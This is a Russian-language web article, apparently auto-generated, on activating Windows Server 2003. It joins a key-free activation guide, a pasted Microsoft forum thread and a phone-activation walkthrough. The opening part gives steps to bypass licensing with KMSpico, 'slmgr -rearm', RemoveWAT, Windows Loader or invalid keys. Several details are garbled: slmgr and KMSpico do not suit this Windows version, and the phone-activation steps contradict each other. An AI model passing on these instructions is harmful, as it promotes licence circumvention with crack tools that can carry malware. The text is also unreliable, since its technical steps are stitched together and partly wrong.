  3. Разархивируйте скачанный файл и запустите установочный файл KMSpico.
  4. Дождитесь завершения процесса установки. В этот момент KMSpico будет добавлен в список программ вашей операционной системы.
  5. Запустите KMSpico и дождитесь окончания процесса активации. Возможно, потребуется перезагрузка компьютера.
  6. После перезагрузки проверьте статус активации Windows Server 2003, убедившись, что система успешно активирована и готова к использованию.

Важно понимать, что использование KMSpico может нарушать лицензионные соглашения и законы о защите программного обеспечения. Рекомендуется использовать данный метод исключительно в легальных целях, например, для тестирования операционной системы.

Второй способ активации Windows Server 2003 без ключа

Шаг 1: Запустите командную строку от имени администратора. Для этого щелкните правой кнопкой мыши по значку «Командная строка» в меню «Пуск» и выберите пункт «Запустить от имени администратора».

Шаг 2: В командной строке введите следующую команду: slmgr -rearm и нажмите клавишу Enter.

Шаг 3: Подождите, пока процесс завершится. Вы должны увидеть сообщение, которое говорит о том, что операция успешно выполнена.

Шаг 4: Перезагрузите сервер, чтобы изменения вступили в силу.

Шаг 5: После перезагрузки сервера проверьте его активацию, запустив командную строку от имени администратора и введя команду: slmgr -dlv. Если сервер успешно активирован, вы должны увидеть сообщение о его статусе активации.

Примечание: этот метод позволяет вам использовать Windows Server 2003 без ключа только на протяжении ограниченного периода времени. По истечению этого периода вы должны будете повторить этот процесс снова.

Эффективные методы активации Windows Server 2003 без использования ключа

1. Использование переустановки системы

Этот метод требует переустановки операционной системы с обновлением старых файлов. В процессе установки необходимо выбрать опцию «Обновление» вместо «Настройка с нуля». После завершения этого процесса Windows Server 2003 будет активирована без необходимости вводить лицензионный ключ.

2. Использование утилиты для обхода активации

Существуют специальные утилиты, такие как «RemoveWAT», «Windows Loader» и другие, которые позволяют обойти активацию Windows Server 2003. Эти утилиты отключают функцию проверки подлинности операционной системы и активируют ее без использования ключа.

3. Использование некорректного ключа

Некоторые пользователи сообщают о возможности активировать Windows Server 2003 с помощью некорректного или официально нерабочего ключа. В некоторых случаях система все равно может пройти активацию и работать нормально без лицензионного ключа.

Важно отметить, что все эти методы нарушают политику использования лицензионного программного обеспечения и могут быть незаконными. Рекомендуется всегда использовать официальные лицензии для работы с операционной системой Windows Server 2003, чтобы избежать возможных проблем с законодательством и безопасностью данных.

  • Remove From My Forums
  • Вопрос

  • Здравствуйте. Как произвести активацию Windows Server 2003, если имеется лицензионный ключ, НО на сервере отсутствует подключение к интернету, а активировать по телефону не получается, т.к. номер указанный не доступен. 

Ответы

  • номер указанный не доступен. 

    По какому именно номеру звоните?

    • Помечено в качестве ответа
      Vector BCO
      6 января 2017 г. 22:11

Все ответы

  • Позвоните на номер в соседнем регионе или подключите инет на 10 минут


    The opinion expressed by me is not an official position of Microsoft

    • Предложено в качестве ответа
      Vector BCO
      20 октября 2016 г. 7:20
  • номер указанный не доступен. 

    По какому именно номеру звоните?

    • Помечено в качестве ответа
      Vector BCO
      6 января 2017 г. 22:11

Активация операционной системы Windows 2003 Server является важным шагом для обеспечения ее правильной работы и получения доступа к множеству полезных функций. В некоторых случаях, особенно при отсутствии постоянного подключения к интернету, активация может быть произведена по телефону. В этой статье мы рассмотрим пошаговую инструкцию по активации Windows 2003 Server по телефону.

Первым шагом для активации по телефону является открытие окна «Активация Windows». Найдите и нажмите на кнопку «Пуск», затем выберите в списке программ «Аксессуары» и «Активация Windows». Если же пункта «Активация Windows» нет, воспользуйтесь поиском, чтобы найти его.

Открывшееся окно «Активация Windows» будет содержать два варианта активации: через интернет и по телефону. Выберите вариант активации «Активировать Windows по телефону». Нажмите на кнопку «Далее», чтобы продолжить.

На следующем экране вам будет предложено выбрать страну, в которой вы находитесь. Выберите свою страну из выпадающего списка и нажмите кнопку «Далее». Теперь на экране появится номер телефона, который вам необходимо набрать для активации Windows 2003 Server. Следуйте указаниям оператора, чтобы завершить процесс активации по телефону.

Примечание: необходимо иметь в виду, что активация по телефону может потребовать ввода специального кода активации, который будет предоставлен вам оператором. Обязательно запишите этот код и введите его, когда будете его просят.

Подведя итог, активация Windows 2003 Server по телефону — простой процесс, который позволяет активировать операционную систему, даже если нет возможности подключения к интернету. Следуйте пошаговой инструкции и введите необходимые данные, чтобы успешно активировать Windows 2003 Server.

Содержание

  1. Активация Windows 2003 Server по телефону: пошаговая схема
  2. Что такое активация Windows 2003 Server и почему она важна?
  3. Шаг 1: Подготовка к активации Windows 2003 Server по телефону
  4. Шаг 2: Получение индивидуального идентификатора продукта (PID)
  5. Шаг 3: Активация Windows 2003 Server по телефону

Активация Windows 2003 Server по телефону: пошаговая схема

Для активации Windows 2003 Server по телефону следуйте данным шагам:

Шаг 1: Откройте меню «Пуск» и выберите пункт «Система».
Шаг 2: В открывшемся окне системных настроек найдите вкладку «Активация».
Шаг 3: На вкладке «Активация» выберите опцию «Активировать по телефону».
Шаг 4: На экране появится окно с номером телефона и уникальным идентификатором.
Шаг 5: Сделайте звонок по указанному номеру телефона и следуйте инструкциям оператора.
Шаг 6: После успешного завершения активации оператор предоставит вам уникальный код активации.
Шаг 7: Введите полученный код активации в соответствующее поле в окне активации.
Шаг 8: Нажмите кнопку «Активировать», чтобы завершить активацию Windows 2003 Server.

Что такое активация Windows 2003 Server и почему она важна?

Активация Windows 2003 Server важна, так как она позволяет получить доступ ко всем функциям операционной системы и обновлениям безопасности. Без активации некоторые функции могут быть ограничены или недоступны. Кроме того, активация обеспечивает соблюдение лицензионных условий использования Windows 2003 Server.

Активация Windows 2003 Server осуществляется через интернет или по телефону. Выбор метода активации зависит от доступности интернет-соединения. Активация по телефону – это альтернативный способ активации для пользователей, которые не имеют доступа к интернету или испытывают проблемы с активацией через интернет.

Шаг 1: Подготовка к активации Windows 2003 Server по телефону

Прежде чем активировать Windows 2003 Server по телефону, необходимо выполнить несколько подготовительных шагов:

  • Убедитесь, что у вас есть активационный ключ, который поставляется вместе с лицензионным диском или электронным скачиванием.
  • Убедитесь, что у вас есть доступ к телефону, с которого вы собираетесь совершить активацию.
  • Удалите любое программное обеспечение, которое может помешать активации, например, программы телефонии или факс-софт.
  • Установите все обновления и патчи для вашей версии Windows 2003 Server.
  • Убедитесь, что у вас есть доступ к интернету, так как активацию можно произвести и онлайн.

После выполнения этих шагов вы будете готовы к активации Windows 2003 Server по телефону.

Шаг 2: Получение индивидуального идентификатора продукта (PID)

Процесс активации Windows 2003 Server требует получения индивидуального идентификатора продукта (Product ID, PID). Для этого выполните следующие действия:

  1. Откройте меню «Пуск» и выберите пункт «Активировать Windows».
  2. Выберите опцию «Активировать по телефону» и нажмите «Далее».
  3. В появившемся окне выберите ваше местоположение и нажмите «Далее».
  4. Вы увидите телефонный номер, который вы должны набрать для активации. Обратите внимание на то, что номер может отличаться в зависимости от выбранного вами местоположения.
  5. Позвоните по указанному номеру и следуйте голосовым инструкциям оператора. Вам может потребоваться предоставить некоторую информацию, такую как установочный код Windows Server 2003, серийный номер и другие данные, чтобы подтвердить валидность вашей копии продукта.
  6. После успешной проверки оператор предоставит вам индивидуальный идентификатор продукта (PID).

Обязательно сохраните полученный PID, так как он понадобится вам на следующем шаге активации Windows 2003 Server.

В случае возникновения проблем или затруднений в процессе получения PID, вы можете обратиться в службу поддержки Microsoft для получения помощи и дополнительных инструкций.

Шаг 3: Активация Windows 2003 Server по телефону

Если вы не смогли активировать Windows 2003 Server через интернет, вы можете воспользоваться активацией по телефону.

Для активации Windows по телефону выполните следующие действия:

1. Прежде всего, убедитесь, что у вас есть телефон соединенный с локальной сетью.
2. Откройте «Системные свойства», нажав правой кнопкой мыши на значок «Мой компьютер» на рабочем столе и выбрав «Свойства».
3. Во вкладке «Общие» нажмите на кнопку «Активация Windows».
4. Выберите пункт «Активация по телефону» и нажмите «Далее».
5. В открывшемся окне будет отображен номер телефона для активации. Выпишите или запомните его.
6. Позвоните по указанному номеру и следуйте инструкциям оператора.
7. В процессе разговора с оператором вам будут заданы некоторые вопросы. Отвечайте на них честно.
8. После успешной проверки оператором введенных вами данных, вам будет предоставлен 42-значный код активации.
9. Введите полученный код активации в соответствующее поле и нажмите «Готово».
10. После ввода кода активации Windows 2003 Server будет активирована и готова к использованию.

Теперь ваш Windows 2003 Server успешно активирован и готов к использованию.

Понравилась статья? Поделить с друзьями:
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
  • Как удалить старую версию python windows
  • Программы для переноса системы с hdd на ssd windows 10 бесплатно на русском языке
  • How to activate windows 10 enterprise
  • Ава windows 10 pro
  • Windows shortcut arrow editor portable